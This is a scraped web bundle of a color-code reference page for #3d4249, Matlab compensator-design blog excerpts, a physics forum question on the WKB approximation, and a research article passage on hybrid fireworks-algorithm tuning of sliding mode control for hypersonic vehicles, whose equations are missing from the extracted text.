#3d4249\n\nBelow, you can see some colors close to #3d4249. Having a set of related colors can be useful if you need an inspirational alternative to your original color choice.\n\n• #3d4549\n``#3d4549` `rgb(61,69,73)``\n• #3d4449\n``#3d4449` `rgb(61,68,73)``\n• #3d4349\n``#3d4349` `rgb(61,67,73)``\n• #3d4249\n``#3d4249` `rgb(61,66,73)``\n• #3d4149\n``#3d4149` `rgb(61,65,73)``\n• #3d4049\n``#3d4049` `rgb(61,64,73)``\n• #3d3f49\n``#3d3f49` `rgb(61,63,73)``\nSimilar Colors\n\n# #3d4249 Preview\n\nThis text has a font color of #3d4249.\n\n``<span style=\"color:#3d4249;\">Text here</span>``\n#3d4249 background color\n\nThis paragraph has a background color of #3d4249.\n\n``<p style=\"background-color:#3d4249;\">Content here</p>``\n#3d4249 border color\n\nThis element has a border color of #3d4249.\n\n``<div style=\"border:1px solid #3d4249;\">Content here</div>``\nCSS codes\n``.text {color:#3d4249;}``\n``.background {background-color:#3d4249;}``\n``.border {border:1px solid #3d4249;}``\n\n# Shades and Tints of #3d4249\n\nA shade is achieved by adding black to any pure hue, while a tint is created by mixing white to any pure color. 
In this example, #070809 is the darkest color, while #fdfdfd is the lightest one.\n\n• #070809\n``#070809` `rgb(7,8,9)``\n• #101214\n``#101214` `rgb(16,18,20)``\n• #191b1e\n``#191b1e` `rgb(25,27,30)``\n• #222529\n``#222529` `rgb(34,37,41)``\n• #2b2f34\n``#2b2f34` `rgb(43,47,52)``\n• #34383e\n``#34383e` `rgb(52,56,62)``\n• #3d4249\n``#3d4249` `rgb(61,66,73)``\n• #464c54\n``#464c54` `rgb(70,76,84)``\n• #4f555e\n``#4f555e` `rgb(79,85,94)``\n• #585f69\n``#585f69` `rgb(88,95,105)``\n• #616974\n``#616974` `rgb(97,105,116)``\n• #6a727e\n``#6a727e` `rgb(106,114,126)``\n• #737c89\n``#737c89` `rgb(115,124,137)``\n• #7d8692\n``#7d8692` `rgb(125,134,146)``\n• #88909b\n``#88909b` `rgb(136,144,155)``\n• #929aa4\n``#929aa4` `rgb(146,154,164)``\n``#9da4ad` `rgb(157,164,173)``\n• #a8aeb6\n``#a8aeb6` `rgb(168,174,182)``\n• #b2b8bf\n``#b2b8bf` `rgb(178,184,191)``\n• #bdc2c8\n``#bdc2c8` `rgb(189,194,200)``\n• #c8ccd1\n``#c8ccd1` `rgb(200,204,209)``\n• #d2d6da\n``#d2d6da` `rgb(210,214,218)``\n• #dddfe3\n``#dddfe3` `rgb(221,223,227)``\n• #e8e9ec\n``#e8e9ec` `rgb(232,233,236)``\n• #f3f3f5\n``#f3f3f5` `rgb(243,243,245)``\n• #fdfdfd\n``#fdfdfd` `rgb(253,253,253)``\nTint Color Variation\n\n# Tones of #3d4249\n\nA tone is produced by adding gray to any pure hue. In this case, #424344 is the less saturated color, while #043982 is the most saturated one.\n\n• #424344\n``#424344` `rgb(66,67,68)``\n• #3d4249\n``#3d4249` `rgb(61,66,73)``\n• #38414e\n``#38414e` `rgb(56,65,78)``\n• #334053\n``#334053` `rgb(51,64,83)``\n• #2e3f58\n``#2e3f58` `rgb(46,63,88)``\n• #283f5e\n``#283f5e` `rgb(40,63,94)``\n• #233e63\n``#233e63` `rgb(35,62,99)``\n• #1e3d68\n``#1e3d68` `rgb(30,61,104)``\n• #193c6d\n``#193c6d` `rgb(25,60,109)``\n• #143b72\n``#143b72` `rgb(20,59,114)``\n• #0f3a77\n``#0f3a77` `rgb(15,58,119)``\n• #09397d\n``#09397d` `rgb(9,57,125)``\n• #043982\n``#043982` `rgb(4,57,130)``\nTone Color Variation\n\n# Color Blindness Simulator\n\nBelow, you can see how #3d4249 is perceived by people affected by a color vision deficiency. This can be useful if you need to ensure your color combinations are accessible to color-blind users.\n\nMonochromacy\n• Achromatopsia 0.005% of the population\n• Atypical Achromatopsia 0.001% of the population\nDichromacy\n• Protanopia 1% of men\n• Deuteranopia 1% of men\n• Tritanopia 0.001% of the population\nTrichromacy\n• Protanomaly 1% of men, 0.01% of women\n• Deuteranomaly 6% of men, 0.4% of women\n• Tritanomaly 0.01% of the population" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.53067744,"math_prob":0.610049,"size":3669,"snap":"2021-43-2021-49","text_gpt3_token_len":1644,"char_repetition_ratio":0.12332878,"word_repetition_ratio":0.011070111,"special_character_ratio":0.5671845,"punctuation_ratio":0.23344557,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9897669,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-27T08:19:01Z\",\"WARC-Record-ID\":\"<urn:uuid:023b9055-db6b-41ce-8f9f-46e93b67145d>\",\"Content-Length\":\"36105\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:cde2f515-7cda-4763-89b0-9647e5dbe579>\",\"WARC-Concurrent-To\":\"<urn:uuid:61926681-e684-4339-a34e-819f0c6a55cf>\",\"WARC-IP-Address\":\"178.32.117.56\",\"WARC-Target-URI\":\"https://www.colorhexa.com/3d4249\",\"WARC-Payload-Digest\":\"sha1:GZXGKDNQBJTSDX6EM5OIZ6IKCYPR4OLE\",\"WARC-Block-Digest\":\"sha1:XQL3DBQXXL2HIXLXKL3WVVB66LLYSWWQ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323588102.27_warc_CC-MAIN-20211027053727-20211027083727-00686.warc.gz\"}"}
https://thebeautifullmind.com/tag/matlab-script/
[ "# Lead Compensator design with Root Locus\n\nThis has been the most difficult part for me since I started writting this series. I took one whole day to figure out how to write a program to designa lead compensator with rot locus in matlab. For those who have followed my previous posts will know by now what the compensators are. As said …\n\n# Lead Compensator design with Bode plot\n\nIntroduction to Matlab Lag Compensator with Bode Plot Lag Compensator with root locus So far we have seen the design of lag compensators, now we move on to lead compensators which help in improving the transient response. We will start from the frequency domain design using bode plot. Here I would like to tell the …\n\n# Lag Compensator design with Root Locus\n\nSo far we have discussed on an Introduction to Matlab and Lag compensator design with bode plot. In this post we will deal with lag compensator design with time domain specifications and using the root locus technique. The steps to design the lag Compensator are Draw the root locus of the given open loop uncompensated …\n\nContinue reading Lag Compensator design with Root Locus\n\n# Lag Compensator design with Bode plot\n\nIn the previous post  An Introduction to compensator Design with matlab we saw an introduction to compensators. In this post we will deal with lag compensator design with frequency domain specifications. The steps to design the lag Compensator are Determine K from the error constatns given Sketch the bode plot Determine phase margin if it is not …\n\nContinue reading Lag Compensator design with Bode plot" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.90638167,"math_prob":0.7203686,"size":1418,"snap":"2022-27-2022-33","text_gpt3_token_len":303,"char_repetition_ratio":0.20792079,"word_repetition_ratio":0.10699589,"special_character_ratio":0.18406206,"punctuation_ratio":0.04330709,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9745547,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-07-05T09:54:36Z\",\"WARC-Record-ID\":\"<urn:uuid:b78d858d-c98c-48c1-8100-ed29fc710b4b>\",\"Content-Length\":\"100935\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c8aee2e8-8e5f-4ee7-99dc-9132e20528b6>\",\"WARC-Concurrent-To\":\"<urn:uuid:286bfe67-cfb9-46f0-979f-dd957537b0f8>\",\"WARC-IP-Address\":\"192.0.78.24\",\"WARC-Target-URI\":\"https://thebeautifullmind.com/tag/matlab-script/\",\"WARC-Payload-Digest\":\"sha1:HNHBTT5VVBWT4YBOAYXZPS4HADAC62WO\",\"WARC-Block-Digest\":\"sha1:6IP73M7O6262HSD63XO7B2HQMLE2QGD3\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656104542759.82_warc_CC-MAIN-20220705083545-20220705113545-00167.warc.gz\"}"}
https://www.physicsforums.com/threads/beyond-wkb.167813/
[ "# Beyond WKB\n\n## Main Question or Discussion Point\n\nIf in 1-D the WKB wave and energy quantization are:\n\n$$\\Psi (x) = e^{iS(x)/\\hbar}$$ and $$\\oint_C dq p =2\\pi (n+1/2) \\hbar$$\n\nMy question is what happens with more than one dimension ?? (many body system or 3-D system), what happens with QFT ?? i know that as an analogy you could always put the WKB wavefunction in the form:\n\n$$\\Psi [\\phi] = e^{iS[\\phi]/\\hbar}$$\n\nbut what happens with the energies??..i know this must/can be used when delaing Semiclassical Quantum Gravity won't it ??" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8492347,"math_prob":0.9939359,"size":1017,"snap":"2020-24-2020-29","text_gpt3_token_len":325,"char_repetition_ratio":0.12734452,"word_repetition_ratio":0.85057473,"special_character_ratio":0.32153392,"punctuation_ratio":0.11682243,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9905639,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-07-15T11:31:13Z\",\"WARC-Record-ID\":\"<urn:uuid:77db2e33-b6cf-488b-b04e-870b23cc90f9>\",\"Content-Length\":\"61567\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:3db1c5af-bf83-46ef-b08c-4069ca5def42>\",\"WARC-Concurrent-To\":\"<urn:uuid:bc6cbc17-847e-403b-82e8-5769772f5268>\",\"WARC-IP-Address\":\"23.111.143.85\",\"WARC-Target-URI\":\"https://www.physicsforums.com/threads/beyond-wkb.167813/\",\"WARC-Payload-Digest\":\"sha1:A3C3YGPXCYR4CEYE3UFGD23CT2EYWWUV\",\"WARC-Block-Digest\":\"sha1:3YJG65MVO4NBGOGMOYEATXFMSBHOFX5K\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-29/CC-MAIN-2020-29_segments_1593657167808.91_warc_CC-MAIN-20200715101742-20200715131742-00497.warc.gz\"}"}
https://www.hindawi.com/journals/complexity/2018/9098151/
[ "/ / Article\nSpecial Issue\n\n## Computational Intelligence in Modeling Complex Systems and Solving Complex Problems\n\nView this Special Issue\n\nResearch Article | Open Access\n\nVolume 2018 |Article ID 9098151 | https://doi.org/10.1155/2018/9098151\n\nXiaomeng Yin, Xing Wei, Lei Liu, Yongji Wang, \"Improved Hybrid Fireworks Algorithm-Based Parameter Optimization in High-Order Sliding Mode Control of Hypersonic Vehicles\", Complexity, vol. 2018, Article ID 9098151, 16 pages, 2018. https://doi.org/10.1155/2018/9098151\n\n# Improved Hybrid Fireworks Algorithm-Based Parameter Optimization in High-Order Sliding Mode Control of Hypersonic Vehicles\n\nAccepted31 Jan 2018\nPublished04 Mar 2018\n\n#### Abstract\n\nWith respect to the nonlinear hypersonic vehicle (HV) dynamics, achieving a satisfactory tracking control performance under uncertainties is always a challenge. The high-order sliding mode control (HOSMC) method with strong robustness has been applied to HVs. However, there are few methods for determining suitable HOSMC parameters for an efficacious control of HV, given that the uncertainties are randomly distributed. In this study, we introduce a hybrid fireworks algorithm- (FWA-) based parameter optimization into HV control design to satisfy the design requirements with high probability. First, the complex relation between design parameters and the cost function that evaluates the likelihood of system instability and violation of design requirements is modeled via stochastic robustness analysis. Subsequently, we propose an efficient hybrid FWA to solve the complex optimization problem concerning the uncertainties. The efficiency of the proposed hybrid FWA-based optimization method is demonstrated in the search of the optimal HV controller, in which the proposed method exhibits a better performance when compared with other algorithms.\n\n#### 1. Introduction\n\nHypersonic vehicles (HVs) have attracted increasing interest given their characteristics of high speed and excellent cost effectiveness to access the space. HVs usually fight in near space at a high speed, in which the aerodynamic properties are difficult to predict . Additionally, owing to the peculiar structure of HVs, the couplings related to aerodynamics, propulsion, and structural dynamics are strong, and this makes HV sensitive to uncertainties . In this study, we focus on the efficacious control design of nonlinear HV dynamics given that uncertainties are randomly distributed.\n\nAs members of sliding mode control methods , high-order sliding mode control (HOSMC) methods exhibit strong robustness and a reduced chattering effect while dealing with uncertainties. For example, Zhang et al. proposed a quasi-continuous HOSMC for HV to effectively alleviate the chattering phenomena. In addition to the chattering effect, several design requirements also should be considered for practical HV control under the effects of uncertainties. The priority is guaranteeing the stability. Furthermore, in order to ensure a satisfactory control performance, high-accuracy tracking of trajectory commands and lower fuel consumption are desired. However, when uncertainties are involved in the nonlinear control structure of HV, it is a challenge to adjust design parameters to reach a satisfied level of tracking performance. 
Two problems have appeared because of introducing uncertainties into the HOSM control of HV.\n\nThe first problem is that the modeling of the relation between the design parameters and the HV tracking performance under the effect of uncertain parameters is complex. Dealing with uncertainty in a probabilistic way, stochastic robustness analysis (SRA) was first proposed by Stengel and Ray , and it is an effective method to evaluate the extent to which the specified design requirements are satisfied. A cost function for SRA is formulated to estimate the likelihood that the design requirements are not satisfied. Subsequently, the design parameter space is searched to minimize the cost function to obtain the optimal performance in the presence of uncertainties . Cao et al. optimized the HV controller parameters by using SRA and hybrid PSO algorithm. However, only the dynamic response indices of step command were concerned in the cost function for SRA . In order to achieve a desired tracking performance despite uncertainties, it is necessary to introduce appropriate indices that characterize the command tracking process and corresponding indicator functions into the optimization problem modeling of HV.\n\nThe second important problem in the HOSM control of HV involves solving the optimization problem. Conventional optimization methods, such as the gradient search method, are no longer suitable given that the partial derivative of the cost function in SRA is difficult to obtain. For complex optimization problem involving uncertainties, a high efficiency computational intelligence optimization algorithm is required to determine the optimal controller parameters of HV to achieve a satisfied level of tracking performance under the influence of uncertainties. Nowadays, various computational intelligence techniques [14, 15], such as genetic algorithm (GA) , particle swarm optimization (PSO) , and differential evolutionary (DE), have been proposed for complex optimization problems with the development of computation technology.\n\nAmong computational algorithms, the fireworks algorithm (FWA) is a relatively new swarm intelligence-based algorithm proposed by Tan and Zhu . It simulates the process of fireworks explosion, in which the “good” fireworks generate more sparks in smaller explosion areas. Numerical experiments indicated that FWA converges to a global optimum with a smaller number of function evaluations than PSO and GA . Li et al. proposed an adaptive fireworks algorithm (AFWA) in which the explosion amplitude of fireworks that fails to produce a better spark increases. To improve interaction of solutions, hybrid algorithm of FWA-DE was developed by Zheng et al. . Zhang et al. proposed an improved FWA by enhancing fireworks interaction. With respect to improvements in the FWA , it is recognized that the diversification mechanism of FWA does not utilize more information on other qualified solutions in the swarm. Therefore, with respect to the HV control under uncertainties that are randomly distributed, it is necessary to develop an improved FWA with enhanced solutions interaction to effectively solve the complex optimization problem of searching for the optimal controller.\n\nIn this study, an improved hybrid FWA-based parameter optimization method is proposed for HV control to achieve an excellent tracking performance in the presence of uncertainties. The main contributions are as follows:\n\nThe uncertainties that are randomly distributed are considered in the modeling phase via SRA. 
The cost function evaluating the probability of design requirements violation is formulated to model the complex relation between design parameters and tracking performance of the uncertain HV system. Appropriate indices of the command tracking response are developed.\n\nA hybrid FWA to search for the optimal design parameters is proposed for the complex optimization problem involving uncertainties to satisfy design requirements with high probability. The introduction of the hybrid FWA into SRA effectively optimizes the tracking performance of the nonlinear HV system under uncertainties.\n\nThis study is organized as follows: In Section 2, the optimization problem in the HOSM control of HV is introduced. In Section 3, the complex relation between design parameters and HV performance under uncertainties is modeled. Section 4 proposes a new hybrid FWA to determine the optimal parameters of HV. Section 5 investigates the global convergence of the proposed hybrid FWA, and the simulation and comparison results are demonstrated. A few conclusions are made in Section 6.\n\n#### 2. HOSM Control Structure of HV with Uncertainties\n\nThe control-oriented model of a generic hypersonic vehicle (HV) is described by . An inverse-square-law gravitational model and centripetal acceleration are considered, and the dynamic differential equations for velocity , altitude , flight-path angle , angle of attack , and pitch rate of HV are as follows:withwhere is the lift, is the drag, is the thrust, and is the pitching moment. , , , , and denote the mass, radial distance, radius of the Earth, gravitational constant, and density of air, respectively. Additionally, , , and denote the reference area, mean aerodynamic chord, and the moment of inertia about -body axes, respectively. denotes the elevator deflection, and denotes the engine throttle setting.\n\nThe thrust in (2) is provided by the engine dynamics, and this is represented as follows :where denotes the engine throttle setting command. It is adopted that and for proper modeling of engine dynamics.\n\nIn order to guarantee the robustness of the HV flight control system, the parametric uncertainties in (1)-(2) are considered as follows:where the uncertainties , , , , , and are bounded.\n\nHV system (1) with engine dynamics is highly nonlinear. The relationship between input variables and the output variables is apparently expressed by the feedback linearization method . We differentiate three times and differentiate four times, and we obtain the following expressions:where , , , and , .\n\nIn order to force the velocity and altitude to track the time-varying commanded output , we define the velocity sliding tracking error and the altitude sliding tracking error as and , respectively. Based on (5) and (7), we havewhere the formulations of , , , , , and are the same as those in .\n\nAs stated in , the matrix in (9) is nonsingular over the entire flight envelope of HV, so (9) is decoupled with the auxiliary control input as follows:\n\nA previous study indicates that if appropriate control parameters are designed, then the finite time stabilization of system (9) is guaranteed by the quasi-continuous HOSMC and , and this is given as follows:with\n\nThe HV control structure based on HOSM is shown in Figure 1.\n\nFor the quasi-continuous HOSM controller (11), the design parameters and define the output trajectory of the HV system, which is shown in Figure 2. In the figure, altitude commands are in the dotted lines, and tracking trajectories are in the solid lines. 
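The equations in this Hindawi row were stripped during extraction. Based purely on the surrounding description (the velocity is differentiated three times and the altitude four times until the throttle and elevator commands appear, and the resulting nonsingular matrix is inverted to decouple the two loops), the input-output structure commonly used in this HV literature looks like the sketch below. The symbols F_V, F_h, B, u_V, u_h are placeholders I introduce, not the paper's notation:

```latex
% Sketch of the decoupled input-output form after feedback linearization of the HV model;
% F_V, F_h and B stand for the lengthy expressions omitted from the extracted page.
\begin{equation*}
\begin{bmatrix} \dddot{V} \\ h^{(4)} \end{bmatrix}
=
\begin{bmatrix} F_V(\mathbf{x}) \\ F_h(\mathbf{x}) \end{bmatrix}
+
B(\mathbf{x})
\begin{bmatrix} \beta_c \\ \delta_e \end{bmatrix},
\qquad
\begin{bmatrix} u_V \\ u_h \end{bmatrix}
:=
B(\mathbf{x})
\begin{bmatrix} \beta_c \\ \delta_e \end{bmatrix}.
\end{equation*}
```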
In order to satisfy the design requirements, it is necessary to optimize the controller parameters.\n\nFurthermore, it is more appealing to satisfy the HV control design requirements under the effects of uncertainties. In Figure 3, the tracking trajectories with uncertain parameters generated randomly are depicted by the solid lines, and the altitude commands are shown by the dotted lines. Within two dashed lines are the trajectories that meet the design requirements.\n\nThe simulations indicate that the same set of design parameters will generate various trajectories in the presence of uncertainties. Therefore, it is necessary to employ a proper measure to quantify a set of data values. In this study, the probability that the design requirements are not satisfied is used for the HV performance evaluation with uncertainties.\n\nTherefore, the target of HV control design involves determining the optimal HOSM control parameters to satisfy design requirements with high probability. It is necessary to solve the following two problems in the HOSM parameter optimization: to develop a cost function that evaluates the likelihood of system instability and the violation of the design requirements, so that the complex relation between HV design parameters and the performance under uncertainties is modeled; to solve the complex optimization problem related to the uncertainties by a high efficient computational intelligence optimization algorithm.\n\n#### 3. Stochastic Robustness Analysis of HV\n\nThe concept of stochastic robustness was proposed by Stengel and Ray , and this is effective in evaluating the extent to which the specified design requirements are satisfied. We deal with uncertainties in a probabilistic way, and thus a cost function to evaluate the likelihood of system instability and the violation of design requirements is formulated via SRA.\n\nThe flowchart of HOSM control design for HV based on SRA is shown in Figure 4.\n\nIn Figure 4, a closed-loop HV system with uncertain parameters is denoted by the dotted box. denotes the indicator function corresponding to the design requirement. The value of is within , and this is 0 if an acceptable performance appears and is 1 otherwise.\n\nWith the indicator function , the probability of satisfying a certain performance requirement is defined by an integral of the corresponding indicator function over the expected variation space of parametric uncertainties. It is a practical method to estimate the probability by Monte Carlo evaluation (MCE) as follows:where represents the HV system with uncertain parameters that are randomly selected within the parameter space . represents the HOSM controller with the design parameter vector , and denotes the sampling numbers.\n\nThus, the cost function for SRA is formed by combining the probability of various design requirements with weights as follows:where the estimated value of the cost function approaches the true value when the sampling number .\n\nAs shown in Figure 4, the optimal design parameters of HV are determined under the guidance of the cost function . Therefore, it is vital to define appropriate stochastic robustness measurements for the cost function to achieve the desired tracking performance despite uncertainties.\n\n##### 3.1. 
Stochastic Robustness Indices and Indicators\n\nIn this section, the stochastic robustness indices and indicators are introduced to evaluate the HV tracking performance in the presence of uncertainties.\n\nAccording to the requirements of HV control design, the first index is set to guarantee system stability in the presence of uncertainties. Additionally, it is necessary to develop performance indices to characterize the command tracking trajectories of HV. The tracking trajectory of a general reference signal is not standardized as that of step signal, and thus common indices, such as setting time, overshoot, and steady error, are no longer suitable. Thus, the following performance indices are introduced.(i)Transient tracking performance:where and represent the transient tracking performance indices for the altitude response and the velocity response, respectively. is the terminal time of the tracking command. and are small positive constants that define the duration of the interested transient stage. A decrease in the value of decreases the tracking error in the transient stage.(ii)Steady tracking performance:where and represent the steady tracking performance indices for the altitude response and the velocity response, respectively. A decrease in the value of decreases the tracking error in the steady stage.(ii)Fuel consumption performance:where and represent the fuel consumption performance indices for the altitude response and the velocity response, respectively. denotes engine throttle setting during the flight. It is necessary to limit within reasonable bounds.(iv)Chattering effect:where denotes the time when the sliding tracking errors and both tend to zero. and represent the maximum chatter amplitude of elevator for the altitude and velocity commands when , respectively. The chattering effect can severely deteriorate the flight control performance, and thus it is necessary to attenuate it.\n\nThrough Monte Carlo sampling, the distribution of aforementioned index values is obtained from the tracking trajectories under uncertainties. In Figure 5, after 200 times of random sampling, the distributions corresponding to the altitude tracking performance indices are shown. In order to evaluate the extent to which the design requirements are satisfied in the presence of uncertainties, the indicator function corresponding to the index should be carefully defined.\n\nThe commonly used indicator is a binary function with two values of 0 and 1 to represent whether the design requirement is satisfied or not. However, for a practical engineering system, there exists an interval between the satisfied and unsatisfied performance. Thus, the following continuous function is employed as the indicator as follows:where denotes the value of the performance index, such as , and , . The positive constant represents , , , or . The positive constant represents , , , or , and and are set by the designer to define the interval between the satisfied and unsatisfied performance.\n\n##### 3.2. 
Optimization Problem\n\nIn order to evaluate the HV tracking performance under uncertainties, the aforementioned indices and indicator functions are employed to formulate the cost function in (14), and they are listed in Table 1.\n\n Metric number Weight in Indicator function Design requirements 1 10.0 (10.0) System stability in altitude response (velocity response) 3 1.0 (1.0) Transient tracking performance in altitude (velocity) response is less than () 5 1.0 (1.0) Steady tracking performance in altitude (velocity) response is less than () 7 1.0 (1.0) Fuel consumption performance in altitude (velocity) response is less than () 9 0.5 (0.5) Chattering effect in altitude (velocity) response is less than ()\n\nBy formulating the cost function , the complex relation between the HOSM controller parameters and the HV tracking performance under uncertainties is modeled. The optimal controller parameters are obtained by solving the following optimization problem:where is the design parameter vector in the HV controller (11), and this is searched within . denotes the weights for the probabilities of various design requirements. The weight in cost function allows a trade-off between design requirements.\n\nOptimization problem (20) is a constrained nonlinear and nonconvex optimization problem, in which the cost function value is calculated with the Monte Carlo method. It is very difficult and time-consuming to determine the optimal solution.\n\nTherefore, for complex optimization problem (20) related to the uncertainties, it is necessary to develop a high efficient computational intelligence optimization algorithm to determine the optimal HV control parameters, so that an excellent tracking performance can be achieved despite uncertainties.\n\n#### 4. Optimization Technique with Improved Hybrid Fireworks Algorithm\n\nIn this section, we propose a hybrid FWA to solve the complex optimization problem of determining the optimal HV control parameters under uncertainties. First, by introducing the GA operators into the mutation process of AFWA, a hybrid FWA is developed with an improved diversification mechanism. Subsequently, the process of the hybrid FWA-based parameter optimization method is illustrated.\n\nInspired by the fireworks explosion, FWA is a relatively new swarm intelligence-based algorithm proposed by Tan and Zhu . In FWA, the fireworks and sparks are considered as the potential solutions in the search space, and the explosion is viewed as a local search around the location of fireworks. The FWA converges to a global optimum with a lower number of function evaluations than those of the PSO and GA . 
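Before the algorithm itself, here is a schematic sketch of how the Section 3 cost function would be evaluated: a Monte Carlo loop over the bounded uncertainties, a continuous indicator per design requirement, and a weighted sum of the estimated violation probabilities. The `simulate_hv` stand-in, the requirement bounds, and the linear indicator ramp are all placeholders, not the paper's model:

```python
import numpy as np

rng = np.random.default_rng(1)

def simulate_hv(design_params, uncertain_params):
    """Placeholder for a closed-loop HV simulation; it fabricates two performance
    indices so the structure of the SRA evaluation loop is visible."""
    noise = uncertain_params.sum()
    transient = abs(design_params[0] - 1.0) + 0.1 * abs(noise)
    steady = abs(design_params[1] - 2.0) + 0.05 * abs(noise)
    return {"transient": transient, "steady": steady}

def soft_indicator(value, lo, hi):
    """Continuous indicator in [0, 1]: 0 below lo (satisfied), 1 above hi (violated),
    a linear ramp in between (stands in for the paper's continuous indicator)."""
    return float(np.clip((value - lo) / (hi - lo), 0.0, 1.0))

REQUIREMENTS = {"transient": (0.5, 1.0), "steady": (0.2, 0.5)}   # (lo, hi) per index
WEIGHTS = {"transient": 1.0, "steady": 1.0}

def sra_cost(design_params, n_samples=200):
    """Weighted sum of Monte Carlo estimates of the violation probabilities."""
    totals = {k: 0.0 for k in REQUIREMENTS}
    for _ in range(n_samples):
        uncertain = rng.uniform(-0.3, 0.3, size=6)    # bounded parametric uncertainties
        indices = simulate_hv(design_params, uncertain)
        for key, (lo, hi) in REQUIREMENTS.items():
            totals[key] += soft_indicator(indices[key], lo, hi)
    return sum(WEIGHTS[k] * totals[k] / n_samples for k in REQUIREMENTS)

print(sra_cost(np.array([1.2, 1.9])))
```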
Subsequently, the AFWA was developed to improve the local search capability of the best firework.\n\nThe search process of AFWA is as follows:(1)Initialization: randomly set the initial locations of fireworks.(2)Explosion: each firework generates a set of sparks by executing the regular explosion operation.(3)Gaussian mutation: select a few fireworks randomly, and execute the Gaussian explosion (mutation) operation on the selected fireworks to generate several sparks.(4)Adaptive amplitude calculation: select the best individual as a firework in the next generation, and calculate its adaptive explosion amplitude.(5)Selection: randomly select other fireworks from all individuals.(6)Return to Step   until the stop criterion is fulfilled.\n\nIn order to execute the regular explosion operation in Step  , the number of sparks of each firework is calculated as follows:\n\nThe explosion amplitude is as follows:where is the number of fireworks. and are two parameters that control the number of sparks and explosion amplitude, respectively. represents the fitness value of , and and denote the maximum and minimum values of the cost function among the fireworks, respectively. A small constant is to avoid zero-division error.\n\nIn order to avoid the overwhelming effect of the best firework, the bound of the spark number is set as follows:where and are the upper and lower bounds for .\n\nFor a -dimension problem, after the calculation of spark number and explosion amplitude, the location of each spark is obtained by randomly setting approximately half of the dimensions (z dimensions), and for each dimension , the value (, ) is set based on (). Therefore, the locations of the explosion sparks are set as follows:\n\nIn order to maintain the diversity, for a few randomly selected fireworks, approximately half of the dimensions are selected to change. The mutation sparks are generated by adding a Gaussian distribution coefficient to as follows:where is the position of kth dimension of the best firework .\n\nIf the new locations of the newly generated sparks are beyond the search space, they are mapped within the search space as follows:where and denote the upper and lower bounds of the th dimension of the search space, respectively.\n\nIn order to improve the local search capability, the best individual is selected as a firework in the next generation. It has adaptive explosion amplitude calculated by selecting an individual that satisfies the following conditions: Its fitness is worse when compared with that of the best firework in the current generation. Its distance to the best individual is minimal among all individuals that satisfy . This is expressed as follows:where denotes all sparks; denotes the best individual among sparks and fireworks. is the best firework in the current generation, and represents the distance.\n\nThe adaptive amplitude of best firework in next generation is calculated as follows:where and are the adaptive amplitude in current generation and the next generation , respectively. is a positive constant (usually higher than 1), and represents the infinity norm.\n\nThe search process indicates that the diversification mechanism of FWA does not utilize more information on all the qualified solutions, and thus it is necessary to enhance the interaction between fireworks and sparks. It is well known that GA is an efficient evolutionary algorithm that performs searches by combining possible solutions in different directions . 
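Before describing how the GA operators are blended in, the explosion and mutation steps summarized above can be sketched as follows. The spark-count and amplitude formulas are the standard ones from the FWA and AFWA papers cited in the reference list, written here for a minimization problem; the exact equations of this paper are not reproduced, and the function names and the simple uniform re-mapping of out-of-range sparks are assumptions.

```python
import random

def spark_counts(costs, total_sparks, s_min, s_max, eps=1e-12):
    """Standard FWA rule: fireworks with lower cost get more sparks,
    clipped to the bounds [s_min, s_max]."""
    worst = max(costs)
    denom = sum(worst - c for c in costs) + eps
    raw = [total_sparks * (worst - c + eps) / denom for c in costs]
    return [min(max(int(round(s)), s_min), s_max) for s in raw]

def explosion_amplitudes(costs, a_hat, eps=1e-12):
    """Standard FWA rule: better fireworks get smaller amplitudes,
    so they search more locally."""
    best = min(costs)
    denom = sum(c - best for c in costs) + eps
    return [a_hat * (c - best + eps) / denom for c in costs]

def explode(firework, amplitude, lower, upper):
    """One explosion spark: perturb roughly half of the dimensions and map
    out-of-range components back into the search space."""
    spark = list(firework)
    for k in random.sample(range(len(spark)), k=max(1, len(spark) // 2)):
        spark[k] += amplitude * random.uniform(-1.0, 1.0)
        if not (lower[k] <= spark[k] <= upper[k]):
            spark[k] = random.uniform(lower[k], upper[k])
    return spark

def gaussian_mutation(firework, best_firework, lower, upper):
    """One Gaussian mutation spark: move selected dimensions toward the best
    firework by a Gaussian coefficient (AFWA-style; variants differ)."""
    spark = list(firework)
    g = random.gauss(0.0, 1.0)
    for k in random.sample(range(len(spark)), k=max(1, len(spark) // 2)):
        spark[k] += (best_firework[k] - spark[k]) * g
        if not (lower[k] <= spark[k] <= upper[k]):
            spark[k] = random.uniform(lower[k], upper[k])
    return spark
```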
